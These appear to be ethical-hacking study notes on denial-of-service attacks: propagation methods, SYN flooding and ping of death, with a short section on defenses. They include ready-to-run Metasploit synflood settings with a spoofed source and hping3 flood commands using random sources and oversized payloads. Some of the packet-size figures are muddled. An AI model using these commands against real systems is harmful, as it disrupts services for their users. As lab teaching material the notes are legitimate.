
#--------------------------Denial Of Service---------------------#

Denial Of Service(DOS):-
------------------------------------
A Denial of Service (DoS) is a type of attack on a service that disrupts its normal function and prevents other users from accessing it. The most common target for a DoS attack is an online service such as a website, though attacks can also be launched against networks, machines or even a single program.

Link:- https://www.youtube.com/watch?v=xdd505iOmDg&ab_channel=Cloudflare

Propagation of Malicious Codes:-
------------------------------------------------
There are three most commonly used malicious code propagation methods.
	1. Central Source Propagation(Publicity)
	2. Back-Chaining Propagation(Publicity)
	3. Autonomous Propagation


Central Source Propagation:-
------------------------------------------
It Requires central source where attack toolkit is installed. when an attacker exploits the vulnerability machine, it opens the connection on infected system listening for file tranfer.
File Transfereing mechanism that is used for tranferring Malicious Code(toolkit) is nomally, HTTP, FTP, RPC.


Back-Chaining Propagation:-
-----------------------------------------
Back-Chaining Propagation requires attack toolkit installed on attacker's machine. When an attacker exploits the vulnerable machine. It Opens the connection on infected system listening for file transfer.  Then the toolkit is copied from the attacker. Once toolkit is installed on the infected system, it will search for other vulnerable system and the process continues.


Autonomous Propagation:-
------------------------------------------
In this process the attacker exploits & send malicious code to the vulnerable system. The toolkit is installed & search for other vulnerable systems. Unlike Central Source Propagation, it does not require any Central Sourcce or planning toolkit on own system. 


#------------------------------------------------------------------------------------------------#

SYN Flooding Attack using Metasploit:-
---------------------------------------------------------

Machines:-
	1. Attacker Machine:- Kali
	2. Victim Machine:- Windows 7

Tools:-
-----------
	1. Nmap
	2. Metasploit

Commands:-
--------------------
#nmap -p 21 192.168.1.132
#msfconsole
#use auxiliary/dos/tcp/synflood
#show options
#set RHOST <victim ip address>
#set RPORT 21
#set SHOST <spoofable ip address>
#set TIMEOUT 30000
#exploit

==>Open Victim Machine & Check/Observe the Utilities Performance Graph
==>Open wireshark and set TCP Packet Filter


SYN Flooding Attack using Hping3:-
----------------------------------------------------

Machines:-
	1. Attacker Machine:- Kali
	2. Victim Machine:- Windows 7

Tools:-
	1. Hping3

Commands:-
--------------------
#hping3 <victim ip address> --flood

==>Open Victim Machine & Check/Observe the Utilities Performance Graph
==>Open wireshark and set TCP Packet Filter


#------------------------------------------------------------------------------------------------#

Distributed Denial Of Service(DDOS):-
------------------------------------------------------- 
A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. 


Link:- https://www.youtube.com/watch?v=OhA9PAfkJ10
Link:- https://www.youtube.com/watch?v=yLbC7G71IyE


Ping of Death:-
----------------------
A Ping of Death attack is a denial-of-service (DoS) attack, in which the attacker aims to disrupt a targeted machine by sending a packet larger than the maximum allowable size, causing the target machine to freeze or crash. The original Ping of Death attack is less common today. A related attack known as an ICMP flood attack is more prevalent.

How does a Ping of Death work:-
--------------------------------------------------
An Internet Control Message Protocol (ICMP) echo-reply message or “ping”, is a network utility used to test a network connection, and it works much like sonar – a “pulse” is sent out and the “echo” from that pulse tells the operator information about the environment. If the connection is working, the source machine receives a reply from the targeted machine.

While some ping packets are very small, IP4 ping packets are much larger, and can be as large as the maximum allowable packet size of 65,535 bytes. Some TCP/IP systems were never designed to handle packets larger than the maximum, making them vulnerable to packets above that size.

When a maliciously large packet is transmitted from the attacker to the target, the packet becomes fragmented into segments, each of which is below the maximum size limit. When the target machine attempts to put the pieces back together, the total exceeds the size limit and a buffer overflow can occur, causing the target machine to freeze, crash or reboot.

Note:-Attacker Sends Malicious Packets larger than 110,000 bytes to victim
Normal Packet Size 65538 bytes

DDOS Ping of Death Attack using Hping3:-
--------------------------------------------------------------

HPING 3:-
----------------- It is a network tool, which is used for crafting the packets, testing the firewall, digital footprinting and much more. 

#hping3 192.168.195.183 -c 10000000000 -d 999999999 --rand-source --flood -p 3306

Check the site status after DDOS:-  https://isitdown.us/
			          https://www.isitdownrightnow.com/

#------------------------------------------------------------------------------------------------#


Defending Against a DoS Attack:-
--------------------------------------------------
The threat of being targeted by DoS attacks have lead many major online services to implement various strategies for handling overwhelming floods of data or traffic.

Some of the anti-DoS techniques:-
---------------------------------------------------
	1. Traffic analysis and filtering
	2. Sinkholing
	3. IP-based Prevention

Traffic analysis and filtering:-
------------------------------------------
Traffic analysis is the process of monitoring network protocols and the data that streams through them within a network. 

Sinkholing:-
------------------
Sinkholing is the redirection of traffic from its original destination to one specified by the sinkhole owners. The altered destination is known as the sinkhole. (The name is a reference to a physical sinkhole, into which items apparently disappear.) Sinkholes can be used for good or ill intent.

Link:- https://www.youtube.com/watch?v=mf6OMPNfLN8
Link:- https://www.youtube.com/watch?v=yPNKQZar-Fw&ab_channel=HackerSploit

IP-based Prevention:-
--------------------------------
An intrusion prevention system (IPS) is a form of network security that works to detect and prevent identified threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious incidents and capturing information about them.